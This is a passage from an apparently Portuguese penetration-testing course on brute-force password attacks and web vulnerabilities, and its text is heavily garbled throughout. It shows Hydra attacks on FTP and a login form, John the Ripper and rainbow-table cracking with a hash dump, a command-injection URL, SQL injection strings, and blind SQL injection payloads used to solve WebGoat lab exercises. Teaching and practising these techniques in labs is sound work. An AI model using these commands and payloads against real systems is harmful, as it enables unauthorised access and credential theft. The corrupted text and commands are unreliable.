11!%! Hrute Aor.e Hma das mais oneidas tnias de invasão de sistemas E sem dQvidaE o brute fore. O mtodo de funionamento de um ataque desse tipo  muito simples? são geradas v3rias tentativas de one<ão a partir do nome de um prov3vel usu3rio da m3quina alvo. 4 tnia onsiste em gerar v3rias ombinaç%es de senas para esse usu3rioE na tentativa de YadivinarY a sena dele. ambm podemos alternar o nome do usu3rioE faDendo brute fore de usu3rio e sena. $ara issoE podemos obter um arquivo amado XGordlistYE no qual podemos gerar diversas ombinaç%es possíveis de senas para testar om o brute fore. +aseados nissoE veremos algumas ferramentas para realiDar esse tipo de teste.

11!)! 5ordlist Hma boa Gordlist  fundamental para o suesso de um ataque de brute fore. = possível omprar GordlistsE faDer doGnload ou at mesmo gerar listas de palavras que serão usadas pelas ferramentas de brute fore.

11.3.1. DoHnloa e orlis" 8ordlists podem ser enontradas em diversos loaisE inluindo redes de ompartilamento de arquivos $2$J. 4bai
ttp?&&GGG1.arenet.ne.jp&kGaring&voab&Gordlists&vofreq.tml

●

ttp?&&GGG.outpost5.om&files&8ord/ists.tml

●

ttp?&&Gordlist.soureforge.net&

Capítulo 11 !&n%&a" de orça ruta - 118 ●

ttp?&&rapidsare.om&files&1**012"1&29+Gordlist.rar

'*') ●

e6ule

●

aDaa

●

orrent

11!4! eração de 5ordlist ;
= crunc# ! 8 B>!FE8 P $tmp$%ordlist-numeric

$nde) ●

(  tamano mínimo da palavra

●

  tamano m3
●

12"#(0)  Carateres que serão usados para a geração da lista emos mais algumas opç%es a definir om esta ferramentaE mas desta veD

vamos tentar riar ombinaç%es mais pr7
Capítulo 11 !&n%&a" de orça ruta - 119 = crunc# 0 0 B>!FE8A0 -t 1uniorGGGG P $tmp$1uniorlist

$nde) ●

1*  tamano mínimo da palavra

●

1*  tamano m3
●

12"#(0)5*  Carateres que serão usados para a geração da lista

@amos faDer uso de outra ferramenta para gerar GordlistsE no asoE a ferramenta GAd. 4 diferença dessa ferramenta para o run  que essa utiliDa uma maneira mais YinteligenteY de gerar as ombinaç%es. @amos gerar a Gordlist om baseado em um arquivo >6/ de um site qualquer que fiDemos doGnload?

= %
;liminando as palavras repetidas?

= cat $tmp$%ordlist V sort -u P $tmp$%ordlist-inteligente

O GAd onsegue gerar ombinaç%es a partir de arquivos em te
11!-! MoEn TEe Ripper O Pon  um dos utilit3rios mais oneidos para deifrar senas no /inu

Hni< ou jon.ini no 8indoGsE por e
vari3vel  valor Os nomes de seç%es e vari3veis são ase,insensitiveE ou sejaE S;C4O1 e

seao1 são a mesma seção e @4B1 e var1 são a mesma vari3vel. Os arateres  e  são ompletamente ignoradosE assim omo linas em brano. 4bai
8ordlist? 4 Gordlist a ser utiliDada pelo PtB. O arquivo pode estar em qualquer lugarE basta espeifiar o amino orreto nessa vari3vel

●

Idle? Configura o Pon para usar seu C$H quando este estiver inativo. -iminui o desempeno da quebra da senaE porm não impata tanto no desempeno de outros programas. O padrão desta opção  ' desabilitadoJ

●

Save? Intervalo no qual o softGare ir3 gravar seu progresso para no aso de uma interrupção ele possa reomeçar novamente de onde avia parado

●

+eep? ;mite um bip quando uma sena  quebrada.

GistHules)Single 'esta seção fiam as regras default do softGare para a quebra das senas. São regras omo substituição de stringsE esrita 1"") e outras. GistHules)ordlist


'esta seção fiam as regras de substituição de arateresE modifiaç%es de palavrasE et quando se est3 usando uma Gordlist para tentar quebrar as senas do arquivo. GistHules)7T 'esta seção fiam as regras utiliDadas quando se est3 quebrando senas ifradas utiliDando o algoritmo '/6 8indoGsJ. IncrementalJ 4qui fiam as regras para o tipo de quebra de senas amado Inremental todos os ZtiposZ de tentativas de quebra de sena que o Pon utiliDa serão e
11.5.1. *ODOS PtB utiliDa alguns modos para que onsiga otimiDar a quebra da sena. ;stes modos são e
6odo 8ordlist

$ara utiliDar esse mtodo voV vai preisar de uma Gordlist. ;

algoritmosE o PtB se benefiiar3 se voV oloar senas om tamanos mais ou menos pareidos perto umas das outras. $or e
●

6odo Single Cra: = neste modo que voV deveria omeçar a tentar quebrar uma sena. 4quiE

alm de v3rias regras de andling serem apliadasE o PtB vai utiliDar mais informaç%es omo o nome ompleto do usu3rio e seu diret7rio ome para tentar desobrir qual  a sena. ;ste modo  muito mais r3pido que o modo Z8ordlistZ.

●

6odo Inremental

;ste  o modo mais poderoso do PtB. 'ele serão tentadas todas as ombinaç%es possíveis de arateres para tentar quebrar a sena ifrada. -ada a grande quantidade de ombinaç%es possíveisE  reomend3vel que se defina alguns parUmetros omo tamano da sena ou onjunto de arateres a serem utiliDadosJ para que voV não fique esperando pela sena ser quebrada por muito tempo. odos os parUmetros para este modo são definidos no arquivo jon.onfE nas seç%es omeçadas om Inremental no nome.

●

6odo ;
;sse modo  bastante omple

11.5.2. LIN:& DF CO*&NDO O Pon suporta v3rias opç%es de lina de omandoE geralmente usadas para ativar determinados modos de uso do softGare. $reste bastante atenção no ase das opç%esE o PtB  ase,sensitiveW Hma araterístia muito legal dele  que  possível abreviar as opç%es da lina de omando desde que não aja ambigidade mais ou menos da maneira omo oorre no sell de roteadores CisoE por e
,,single? -efine o modo ZsingleZ para quebrar as senas.

●

,,Gordlist4BRHI@O? -efine o modo ZGordlistZ para quebrar as senas e define o arquivo 4BRHI@O omo sendo de onde as senas serão lidas. 4qui voV pode utiliDar tambm a opção ,,stdin para diDer que as palavras virão da entrada padrão.

●

,,inremental? -efine que ser3 utiliDado o modo ZinrementalZ para quebrar a senas. Opionalmente voV pode definir que tipo de modo inremental ser3 utiliDado faDendo ,,inrementalc6O-Oh.

●

,,e
●

,,rules? >abilita as regras para Gordlist definidas em jon.onf quando se utiliDa o modo Gordlist.

●

,,stdoutc/;'9>h? Ruando utiliDadoE faD om que o PtB imprima as possíveis senas direto na saída padrão ao invs de tent3,las ontra um as. Se voV definir o parUmetro /;'9> s7 serão impressas senas om arateres at a quantidade espeifiada em /;'9>.

●

,,restorec'O6;h? FaD om que uma sessão que foi interrompida anteriormente ontinue de onde parou. Se voV definir um nome diferente para a sessãoE espeifique o nome dela na lina de omando


junto om esta opção. 4 sessão fia gravada na ome do PonE em um arquivo amado jon.re. ●

,,session'O6;? -efine o nome da sessão que pode ser utiliDado om a opção restore. 4 esse nome ser3 automatiamente adiionado a e
●

,,statusc'O6;h? 6ostra o status da Qltima sessão ouE se definido o nome da sessãoE da sessão espeifiada.

●

,,ma:e,arset4BR? 9era um arquivo arset para ser utiliDado no modo ZinrementalZ.

●

,,soG? 6ostra as senas do arquivo que voV espeifiou para o PtB que j3 foram quebradas. ;sta opção  espeialmente Qtil quando voV tem outra instUnia do PtB rodando.

●

,,test? ;sta opção faD um benmar: de todos os algoritmos ompilados no softGare e os testa para saber se estão funionando orretamente. ;sta opção j3 foi e
●

,,usersc,h'ome do usu3rio ou HI-? Com esta opção voV pode espeifiar para o PtB quais usu3rio voV quer tentar quebrar a sena. @oV pode utiliDar o nome de usu3rio ou o HI- dele e pode separar v3rios usu3rios utiliDando uma vírgula. HtiliDando o Z,Z antes do nome do usu3rioE voV faD om que o Pon ignore aquele usu3rio ou HI-.

●

,,groupsc,h9I-? FaD om que o Pon tente quebrar apenas as senas dos usu3rios partiipantes de um grupo espeifiado ou ignor3,losE se voV utiliDar o Z,ZJ.

●

,,sellsc,hS>;//? 4penas tenta quebrar as senas dos usu3rios ujas sells sejam iguais à que foi espeifiada por voV na lina de omando. HtiliDando o Z,Z voV ignora as sells espeifiadas.

●

,,saltsc,h'H6;BO? -ei

,,formatFOB64O? $ermite a voV definir o algoritmo a ser usado para quebrar a senaE ignorando a deteção autom3tia do softGare. Os formatos suportados atualmente são -;SE +S-IE 6-(E 4FS e /6. @oV tambm pode utiliDar esta opção quando estiver utiliDando o omando ,,testE omo j3 foi e
●

,,save,memorA1E 2 ou "? ;sta opção define alguns níveis para diDer ao Pon om qual nível de otimiDação ele ir3 utiliDar a mem7ria. Os níveis variam de 1 a "E sendo 1 a mínima otimiDação. ;sta opção faD om que o PtB não afete muito os outros programas utiliDando muita mem7ria.

11.5.3. ! s)J

ambm podemos passar na sinta
Capítulo 11 !&n%&a" de orça ruta - 126 = "$1o#n -%ordfile:$tmp$1uniorlist pass%ord

O Pon gera dois arquivos de log? o Yjon.potYe o YrestoreY. 'o primeiro arquivo estão as senas j3 deifradasE para que em uma nova e
= importante ressaltar que o Pon e Bipper possui m7dulos adiionais que não são ompilados durante uma ompilação padrão. ;sses m7dulos podem ser enontrados

no

pr7prio

site

da

ferramentaE

atravs

do

endereço?

ttp?&&GGG.openGall.om&jon&. Os m7dulos adiionais se enontram no final da p3gina iniial. Como e
11!6! T;CD;Kdra O Adra  um dos utilit3rios que abrangem uma grande quantidade de serviços que podem ser alvos de brute foreE entre eles? ;/';E F$E FirebirdE >$,9;E >$,>;4-E >$S,9;E >$,>;4-E >$,$BOKTE >$,$BOKT, '/6E >$,FOB6,9;E >$,FOB6,$OSE >$S,FOB6,9;E >$S,FOB6, $OS/-4$2E /4-$"E S6+E S6+'E 6S,SR/E 6TSR/E $OS9B;SE $O$" '/6E I64$E I64$,'/6E 'C$E ''$E $C'FSE ICRE S4$&B"E Ciso autE Ciso enableE S6$,4H>E S6$,4H> '/6E SS>2E S'6$E C@SE Ciso 444E B;K;CE SOCS(E @'CE $O$" e @6Gare,4ut. 4lm dissoE o Adra fornee suporte a one<%es via


pro
11.6.1. Adra9E basta aessar o endereço? #ttp:$$free%orld"t#c"org$releases$#
4p7s bai
$ara e
11.6.2. :ra no "er(inal

;
Capítulo 11 !&n%&a" de orça ruta - 128 ;" cJ B00> )< van ;auser $ T;? - use allo%ed onl< for legal purposes" ;-0A-B8 F:A:B WD/T/X ! tas&s,  servers, ! login tries l:!$p:J, ] tries per tas& WD/T/X attac&ing service ftp on port B WY9.'SX 9esolving addresses """ done WST/TSX attac& finis#ed for AB"F8"0"00 %aiting for c#ilds to finis#J WBXWftpX #ost: AB"F8"0"00 login: 4 pass%ord: B>!F ;-0A-B8 F:A:BA

;m Y&tmp&usuariosY temos a userlist de ftpE em Y&tmp&passY temos a Gordlist para os usu3rios e em Y&tmp&resultadoY o resultado do brute fore no serviço. @ejamos o onteQdo do arquivo de saída do brute fore? = cat $tmp$resultado = ;" run at B00>-0A-B8 F:A:B on AB"F8"0"00 ftp #
-@

$tmp$usuarios

-

$tmp$pass

-t

!

-v

-o

$tmp$resultado

AB"F8"0"00 ftpJ WBXWftpX #ost: AB"F8"0"00 login: 4 pass%ord: B>!F

O >C,>Adra tambm pode ser usado para realiDar ataques ontra formul3rios Geb. $ara issoE podemos usar a opção ttp,post,form ou ttp,get,formE dependendo do mtodo usado para envio dos dados pelo formul3rio Geb. @amos analisar o omando seguinte? =

#
-l

#
-

pass%ord"lst

-s

80

ZIP

#ttp-post-form

[$administrador$inde4"p#p:usuarioL^S9^_sen#aL^/SS^_su)mitL@o gin:Incorrect sername[

O parUmetro HS;B ser3 substituído pelos usu3riosE no nosso asoE o valor passado para a opção lE no nosso aso o valor XAdraYE e o parUmetro $4SS ser3 substituído pelos valores passados na opção $E no nosso asoE uma Gordlist amada passGord.lst.


'o e
11!! HruteSS;% O +ruteSS>2  um sriptE que pode ser enontrado em CE $erl ou $AtonE que realiDa ataques de força bruta na porta 22 e utiliDa Gordlists para desobrir senas. $ara e
11!2! Rain#oG Cra.< BainboGCra:  um programa que gera rainboG tables para serem usadas na quebra de senas. O BainboGCra: difere dos programas de força bruta onvenionaisE pois utiliDa tabelas previamente riadasE amadas rainboG tablesE para reduDir drastiamente o tempo neess3rio para quebrar senas. Hm 7timo programa para utiliDarmos para quebrar senas 8indoGs om rainboG tables  o Opra: =aptitude install op#crac&


Outro programaE que quebra inlusive ass 6-(E S>41E S>42 e etE  o Cain que roda em 8indoGsJ. ●

$ara bai
●

$ara entender mais? #ttp:$$%%%"et#ical#ac&er"net$content$vie%$A>$B>$

11!! Ntili>ando o Rain#oG Cra.< para .riação de Rain#oG Ta#les 11..1. In"ro')=o BainboGCra:  uma ferramenta ujo objetivo  quebrar as de senas. O mtodo utiliDado pela ferramenta  o brute fore. 'esse mtodoE todas as senas em te
$asso 1? usar o rtgen para gerar as rainboG tables.


$asso 2? usar o rtsort para organiDar as rainboG tables geradas pelo rtgen.

●

$asso "? usar o rra: para busar o onteQdo das rainboG tables organiDadas pelo rtsort.

O proesso de busar o onteQdo no passo finalE  equivalente ao proesso de quebra de as. ; todas essas ferramentas são utiliDadas atravs da lina de omando.

11..2. Passo 1G 'sar o r"#en $ara #erar as rain%oH "a%les. O programa rtgen preisa de diversos parUmetros para gerar uma rainboG tableE e a sinta
#as#Kalgorit#m

c#arset

plainte4tKlenKmin

plainte4tKlenKma4

ta)leKinde4 c#ainKlen c#ainKnum partKinde4

;
table_inde< ain_len ain_num part_inde<

significado O algoritmo dos ass lmE ntlmE md( e assim por dianteJ usado na rainboG table. 4 onfiguração dos arateres arsetJ do te
Capítulo 11 !&n%&a" de orça ruta - 132 onfigurada omo 10 bAtes  a menor unidade em uma rainboG table. Hma rainboG tables ontm diversas rainboG ains. O ains_num  o nQmero de rainboG ains em uma rainboG table. O parUmetro part_inde< determina omo o Zstart pointZ em ada rainboG ain  gerado. -eve ser um nQmero ou omeçar om um nQmeroJ.

Os valores orretos de todos os parUmetros dependem do que voVs preisaE e seleionar bons parUmetros requer um bom entendimento do algoritmo de time, memorA tradeoff. Hma onfiguração que funiona est3 logo abai
plainte
table siDe suess rate

omandos para gerar as tabelas

lmE ntlm or md( alpa,numeri  c4+C-;F9>IP/6'O$RBSH@8KT`*12"#(0) 5h ou loGeralpa,numeri  cabdefgij:lmnopqrstuvG
Se preisar riar uma tabela de ases ntlm ou lmE substitua o Zmd(Z nos omandos aima por ZntlmZ ou ZlmZ. Se preisar de uma tabela om o arset alpa, numeriE substitua o ZloGeralpa,numeriZ nos

Capítulo 11 !&n%&a" de orça ruta - 133 omandos aima por Zalpa,numeriZ. Se uma tabela om ases lm for riadaE tena erteDa de que seu arset seja alpa,numeri ao invs de loGeralpa,numeri. O algoritmo lm nuna utiliDa arateres minQsulos omo strings.

4gora  ora de riar uma rainboG table. 4ltere o diret7rio orrente em seu terminal de omando para o diret7rio do BainboGCra:E e e>B 0

;sse omando leva # oras para ser ompletado em um omputador om um proessador Core2 -uo ;)"**. = possível parar a e>B 0 = rtgen md! lo%eralp#a-numeric  E B 800 !!>>B 0 = rtgen md! lo%eralp#a-numeric  E  800 !!>>B 0 = rtgen md! lo%eralp#a-numeric  E > 800 !!>>B 0 = rtgen md! lo%eralp#a-numeric  E ! 800 !!>>B 0

FinalmenteE esses arquivos são gerados?


md(_loGeralpa,numeri1,)_*_"**<""((##"2_*.rt

(126+

●

md(_loGeralpa,numeri1,)_1_"**<""((##"2_*.rt

(126+

●

md(_loGeralpa,numeri1,)_2_"**<""((##"2_*.rt

(126+

●

md(_loGeralpa,numeri1,)_"_"**<""((##"2_*.rt

(126+

●

md(_loGeralpa,numeri1,)_#_"**<""((##"2_*.rt

(126+

●

md(_loGeralpa,numeri1,)_(_"**<""((##"2_*.rt

(126+

4goraE o proesso de riação da rainboG table est3 ompleto.

11..3. Passo 2G 'sar o r"sor" $ara or#aniEar as rain%oH "a%les 4s rainboG tables geradas pelo programa rtgen preisam de um p7s, proessamento para tornar sua onsulta mais f3il e r3pida. O programa rtsort  utiliDado para organiDar todas as rainboG ains em uma rainboG table. HtiliDe os seguintes omandos? = rtsort md!Klo%eralp#a-numeric=-EK0K8004!!>>BK0"rt = rtsort md!Klo%eralp#a-numeric=-EKK8004!!>>BK0"rt = rtsort md!Klo%eralp#a-numeric=-EKBK8004!!>>BK0"rt = rtsort md!Klo%eralp#a-numeric=-EKK8004!!>>BK0"rt = rtsort md!Klo%eralp#a-numeric=-EK>K8004!!>>BK0"rt = rtsort md!Klo%eralp#a-numeric=-EK!K8004!!>>BK0"rt

Cada omando aimaE leva era de 1 a 2 minutos para ompletarem sua e

11..4. Passo 3G 'sar o r!ra!/ $ara %'s!ar o !on"eJo as rain%oH "a%les O programa rra:  utiliDado para aessar as rainboG tables. ;le aeita apenas rainboG tables organiDadas. 4ssumindo que as rainboG tables organiDadas estejam no mesmo diret7rio do programaE para quebrar ases Qnios a lina de omando ser3? = rcrac& "rt -# aquiKvaiKoK#as#KparaKserKque)rado

O primeiro parUmetro espeifia o amino para busar nos arquivos das rainboG tables. Os arateres ZZ e Z!Z podem ser usados para espeifiar v3rios arquivos. 'ormalmente isso leva algumas deDenas segundos para finaliDarE se a string e
Se as rainboG tables que gerou usam o algoritmo lmE o programa rra: possui um suporte espeial para o parUmetro Z,fZ. Hm arquivo de dump de as no formato pGdump  neess3rio omo input para o programa rra:. O onteQdo do arquivo pareer3 om o seguinte? 4dministrator?(**?1"a2b0d5"5a1*21aad"b#"(b(1#*#ee?e2#1*05#2bf"bf()a0a#b25*10eff0??? 9uest?(*1?a2505e#20)e5ba5aad"b#"(b(1#*#ee?5d5)dda5(e(1(bbeda5b"ae**f#b#???

O arquivo pGdump  a saída de utilit3rios tais omo pGdump2E pGdump" ou outros. ; ontm os ases tanto lm quant ntlm.


$ara quebrar ases lm em arquivos pGdumpE use o seguinte omando? = rcrac& "rt -f arquivoKp%dump

O algoritmo de as lm onverte todas as letras minQsulas em strings maiQsulas omo resultado dissoE todas as strings quebradas atravs do ase lmE nuna ontm letras minQsulaE enquanto que a string original poed onter letras minQsulas. O programa rra: tentar3 orrigir isso em ases ntlm armaDenados no mesmo arquivo e e
11!10! Pr/ti.a dirigida 1. HtiliDando o arquivo sadoG passado pelo instrutorE vamos eC,>AdraE vamos e e
11!11! "SST33 Re.omenda ●

4taque automatiDado de diion3rio a pasta de senas

●

4taque de força bruta a pasta de senas

●

4taque de força bruta em serviços.

●

Obter a pasta de senas do sistema que guarda nomes de usu3rio e sena

●

$ara sistemas Hni
●

$ara sistemas Hni< que realiDam autentiaç%es S6+E pode enontrar as


senas de ' em &et&smbpassGd ●

$ara sistemas 'E deverão estar em &Ginn&repair&Sam

11!1%! Contramedidas Hma boa polítia de senasE de forma a garantir que? ●

Senas são troadas periodiamente

●

4 sena deve ter no mínimo  arateres

●

4 sena deve ser omple
●

4 mesma sena não pode ser usada dentro de um período mínimo


Capítulo 1% =ulnera#ilidades em apli.aç*es Ge#

1%!1! "#$etivos ●

●

;ntender o funionamento das apliaç%es Geb 4prender a e
Capítulo 12 ulnera%l%dade" e apl%&aç.e" :e - 139

1%!%! 7ntendendo a apli.ação Ge# 4pliaç%es Geb são programas que fiam em um servidor Geb e e
8ebmails

●

Geb f7runs

●

+logs

●

/ojas virtuais

1%!)! Por &ue ' tão perigoso( O objetivo de tentar e

e
;ssa Qltima parte pode ser um pouo mais ompliada de onseguir. 'o entantoE utiliDando da engenaria soial  possível onseguir que o administrador do site faça o upload do arquivo para o siteE ou at mesmo le passe os dados para faDer o login do ftp do servidor onde o site alvo est3 ospedado.


1%!4! Prin.ipais Classes de =ulnera#ilidades +aseado no O$ 1* O84S$E que  um ran:ing das 1* maiores vulnerabilidades 8;+ atualiDado anualmenteE seguem abai
Command Injetion

●

SR/ Injetion

●

Cross Site Sripting KSSJ

●

CSBF

●

Inseure -iret Objet Beferene

●

Fala de 4utentiação e gereniamento de sessão

●

Falas em onfiguração de segurança

●

Inseure CrAptograpi Storage

●

Failure to Bestrit HB/ 4ess

●

Insuffiient ransport /aAer $rotetion

●

Hnvalidated Bedirets and ForGards

12.4.1. Co((an InKe!"ion Falas dessa lasse lasse oorrem oorrem simplesment simplesmente e porque o programador programador não filtrou filtrou o onteQdo que reebe de um usu3rio e envia para funç%es que e$ $>$.. Hma veD que um usu3rio maliioso onsegue enviar arateres de esape  M N LJ e esse essess ara arate tere ress são são envia enviado doss para para a apli aplia açã ção o vuln vulner er3ve 3velE lE o ataa ataant nte e onseguir3 e
Capítulo 12 ulnera%l%dade" e apl%&aç.e" :e - 142 #ttp:$$%%%"#ostvuln"com$meuscript"cgi7fileL\id\unameMB0-a

'o e
12.4.2. Co((an InKe!" - Sell P:P Hm dos mais famosos sell em pp  o C55E riada pelo Captain Crun SeuritA eamE eamE mas e
4 partir de um site vulner3velE podemos amar a sell que est3 ospedada em um site e simplesmente omeçar a operar dentro do site omo se tivVssemos na lina de omando. Como por e
12.4.3. SL InKe!"ion SR/ SR/ Inje Injet tio ion n  um probl problem ema a que que oor oorre re quan quando do o progra programa ma não não filt filtra ra arateres espeiais enviados pelo usu3rio antes de faDer a requisição para o bano de dadosE enviando arateres que serão interpretados pelo bano de dados. SR/ Injetion  mais omum em apliaç%es GebE porm outros tipos apliaç%es tambm


podem estar vulner3veis. @amos @amos analisar o treo de 7digo abai
Como fiaria a amada no bano de dados se envi3ssemos no username e passGord o onteQdo?  or 11 ! Beposta? Select  from usuarios %#ere %#ere username L ` or `L` and pass%ord L ` or `L`\

Onde?  - Oec#a a variavel de entrada do usuario '9 - ?ontinua a e4press3o S@ L - ma e4press3o verdadeira

Como 1  sempre igual a 1E teremos uma XverdadeY e passaremos pela eagem. ;sse  um tipo de dados que poderíamos passar para apliativos vulner3veis e burlar o sistema de autentiação. Faremos Faremos isso na pr3tia om o 8eb9oat. E3emplos de SLG InMection ? InMection ?  or   or L  or LorL  or aLa J or aLa or L


12.4.4. Cross-Si"e S!ri$"in# >SS Cros Cr oss, s,si site te sri sript ptin ing g KS KSSJ  um tipo tipo de vuln vulner erab abil ilid idad ade e de segu segura ranç nça a tipiamente enontrada em apliaç%es Geb que permite inserção de 7digos por usu3rios Geb maliiosos dentro das paginas vistas por outros usu3rios. ;6/E Pava Sript e outros outros lient,side lient,side sripts. Hma das formas mais omum de e@inu4J\Z$scriptP

Se obtiverem a mensagem PavaSript XOl3 #/inu
Ruando o navegador da vítima abrir este Pava Sript injetadoE o seu oo:ie ser3 enviado para o site do ataante. KSS tambm  amplamente usado para $isingE na tentativa de dar mais valor a informação fraudulenta que foi enviada para o alvoE pois o alvo ver3 uma fonte onfi3vel site vulner3velJ. 4 solução para o problema  simplesE apesar de não ser tão simples implement3,la. +asta substituir os arateres L e N que são reebidos pelos usu3rios por lt e gt respetivamenteE pois o lt  usado para imprimir o sinal de menor LJ na telaE que  o que o usu3rio est3 de fato enviando e não deve ser interpretado pelo


navegador Geb do liente. ambm e
12.4.5. CS9 ●

Semelante a KSS igual!J Os parUmetros utiliDados e o formato de ataque  muito pareido om o KSS. InlusiveE o tipo de ataque CSBF surgiu a partir do KSSE quando os ataantes pereberam que a partir da amada para e
●

Rualquer sistema vulner3vel a KSS est3 vulner3vel a KSBF Como KSS pode servir de suporte para lançar ataques do tipo CSBFE toda apliação que  vulner3vel ao primeiroE pode ser e
●

'em toda apliação vulner3vel a KSBF est3 tambm vulner3vel a KSS = possível utiliDar filtros para minimiDar ataques KSSE mas nem sempre esses filtros onseguem barrar entradas maliiosas que utiliDam outras metodologias para lançar um ataque CSBF. $ortantoE se a apliação est3 protegida de KSSE não se pode onfiar que tambm esteja protegida de CSBF.

●

$ermite alterar as informaç%es enviadas ao navegador. $ermite ir alm dos ataques de KSSE manipulando os parUmetros que são


enviados ao navegadorE alterando a resposta do mesmo para a vítima. ●

4taque lient,side 'ão afeta diretamente o servidorE que pode nem mesmo detetar que est3 sendo alvo de um ataqueE pois as entradas maliiosas podem ser onfundidas om entradas v3lidas vinda do liente aessando a apliação.

●

'ão se baseia em e
●

+aseia,se em enviar requisiç%es om as redeniais do usu3rio para o servidor. Como itado anteriormenteE o servidor não onsegue difereniarE perante esse tipo de ataqueE o que  7digo maliioso ou usu3rio ilegítimoJE de uma requisição legítima vinda do usu3rio v3lido.

12.4.6. Inse!'re Dire!" O%Ke!" eferen!e Confiar em informaç%es passadas pelo usu3rio? ●

Campos idden

●

Coo:ie adminfalseJ

;sse tipo de vulnerabilidade simplesmente e

Sempre que quiser aessar a apliação omo XadminYE ter3 essa permissãoE omo se ouvesse enviado uma requisição v3lidaE baseada em um objeto refereniado e maneira insegura. 4bai
$ermite e
/oal File Inlude

'ossibilidades ? ●

4essar 4rquivos do Sistema Operaional

●

;nquadra,se em Information /ea:

●

Obter lista de usu3rios &et&passGdJ

●

Obter informaç%es do servidor ;
●

Obter informaç%es de onfiguraç%es ;
●

+O'HSJ $ermite e
●

4@4'4-OJ $ermite obter sena de aesso ao servidor

12.4.7. 9ala e &'"en"i!a)=o e #eren!ia(en"o e sess=o odas as veDes que um usu3rio preisa autentiar,se em uma p3gina para aessar onteQdos pessoaisE propriet3rios ou sigilososE uma srie de parUmetros  enviada ao servidor para que o mesmo valide o usu3rio e rie uma sessão pr7pria para o mesmo. Se esse meanismo tiver falasE um ataante pode e
$ 5ue N sessãoO


4 sessãoE session em inglVsE tem uma função bem pareida om a do oo:ieE que foi e
$ 5ue N coo=ieO Coo:ies são arquivos de te
que est3 visualiDando o siteE usamos os oo:ies. $or e
Como fa.er um ata5ue P sessãoO ➢

➢

Session QiMac=ing ●

4travs de falas de KSS

●

4travs de Sniffer de rede loalJ

●

4travs de oo:ies armaDenados

Session Fi3ation ●

'ão  neess3rio estar logado


●

●

9era,se uma sessão para o usu3rio

●

;spera,se ele autentiar e utiliDa,se a sessão j3 oneida.

Solução ●

'ão utiliDe oo:ies !J

●

'una armaDene informaç%es que não podem ser modifiadas?

●

●

➢

adminfalse

➢

logadofalse

➢

userid1**1

'una utiliDem algoritmos pr7prios de geração de to:ens de oo:ie

'roteção contra Se5uestro de Sessão por ;SS ●

4 fala não est3 na sessão

●

o:ens em formul3rios

●

>ttpOnlA

●

HtiliDar riptografia ttpsJ

●

8eb 4ppliation FireGall

12.4.8. Inse!'re Cr$"o#ra$i! S"ora#e odas as informaç%es reebidas ou manipuladas por uma apliação 8;+E fiam armaDenadas em algum loalE seja ele um bano de dados no mesmo servidorE ou remoto. 4 forma omo essas informaç%es estão sendo armaDenadas em uma base de


dadosE por e
Senas fraas  +rute,fore

●

Senas fortes  8ordlist

●

BainboGra: ] as sites

●

6d( 8eb Cra:ers - #ttp:$$%%%"md!crac&"com$

4iferenças) ●

+rute,fore 'ormal?  "(* mil%es de senas te
●

BainboG  02.22" mil%es de senas em te

12.4.. 9ail're "o es"ri!" <L &!!ess

●

Controle de sessão para aessar as p3ginas.

'em sempre todas as p3ginas de uma apliação podem estar aessíveis aos lientes que navegam por ela. 'a maioria das veDesE 3 alguma parte da apliaçãoE ou sessão espeífia de um siteE que não pode ser aessada por todosE mas apenas por usu3rios adastrados que se autentiquem atravs de algum sistema de autentiação e ontrole de aesso. ●

Sem qualquer ontrole de permissão entre as p3ginas. Isso s7 oorre quando todas as sess%es do site são abertas a quem estiver

navegando pelo mesmo. 'ormalmenteE aontee em sites mais simplesE que não manipulam informaç%es onfideniais. ●

Se tiver uma sessão  possível aessar qualquer p3gina. Ruando 3 o gereniamento de aesso e autentiação de usu3rios para

aessar p3ginasE  gerada uma sessãoE ou oo:ieE om a validação do usu3rio. Com o usu3rio validadoE o liente pode aessar qualquer p3gina do site de aordo om suas permiss%es. O que poderia oorrer se ouvesse um sequestro de sessão desse usu3rio validado! O ataante teria aesso à todas as p3ginas uja permissão do usu3rio possibiliteW ; se ainda utiliDar a tnia de Xsession fi
1%!-! Aerramentas para e8ploração ●

FireCat , onjunto de plugins para o firefo<.

●

Firebug , plugin do firefo< para alteração de parUmetro no broGser liente.

●

8ebSarab , pro

enviados pelo navegador. ●

$aros $ro
●

'essus , ferramenta de varredura em busa de vulnerabilidadesE baseado em plugins onstantemente atualiDadoE esritos em '4S/.

●

'i:to , ferramenta de busa de vulnerabilidades e falas de onfiguração do 8ebserver 4pae.

●

I;8at ,  um plugin para o 6irosoft Internet ;$ e >$SE alm de 7digo fonte >6/.

●

8iresar: , sniffer de rede que possibilita a an3lise de protoolos e filtro de paotesE a partir de regras personaliDadasE que trafegam na rede.

●

8apiti , sanner de vulnerabilidade de apliaç%es GebE pesquisa falas KSSE injeção de SR/ e K$atE inlus%es de arquivo loal e remotoJ a e
●

8"4F  frameGor: para auditoria e teste de invasão em apliaç%es Geb.

1%!6! Pr/ti.a dirigida 12.6.1. Paros Pro $rimeiramenteE  importante entender omo a ferramenta $aros $ro

ele envia antes o pedido para o pro
1%!! ?a#orat9rio O 5e#oat ●

Iremos testar ada uma das vulnerabilidades estudadas utiliDando a ferramenta 8eb9oat.

●

4p7s e
Capítulo 12 ulnera%l%dade" e apl%&aç.e" :e - 154 ●

4essar o endereço? #ttp:$$guest:guestGBE"0"0":8080$%e)goat$attac&

●

4lgumas serão e
●

4s soluç%es enontram,se na pr7pria apliação.

●

>3 um lin: para os vídeos om as soluç%es na pr7pria apliaçãoE tambmE aso as dias esritas não estejam laras.

12.7.1. Sol')es $ara os esafios B eboat Code Luality +asta olar o 7digo fonte do tmlE pois o login e sena estão omentados no 7digo. B InMection Flas -B Command InMection $reisamos injetar um omando. 'o aso do 8indoGsE devemos usar o  para usar mais de um omando na mesma lina. O  no 8indoGs seria omo o  do linu;B; userid1(01"J   ,,


$ara resolver o problemaE devemos testar em todas as posiç%esE todos os arateres. ;;B; userid1(01"J  )# ,, 1*1 4'- S;/;C 4SCIISH+SBfirst_nameE2E1JJ FBO6 user_data 8>;B; userid1(01"J  111 ,, 1*1 4'- S;/;C 4SCIISH+SBfirst_nameE"E1JJ FBO6 user_data 8>;B; userid1(01"J  1*1 ,, 1*1 4'- S;/;C 4SCIISH+SBfirst_nameE#E1JJ FBO6 user_data 8>;B; userid1(01"J  11( ,, 1*1 4'- S;/;C 4SCIISH+SBfirst_nameE(E1JJ FBO6 user_data 8>;B; userid1(01"J  112 ,, 1*1 4'- S;/;C 4SCIISH+SBfirst_nameE0E1JJ FBO6 user_data 8>;B; userid1(01"J  1*#  4 stima letra não e

+asta usar o $arosE faDer a requisição e inserir ? OB 11 ;
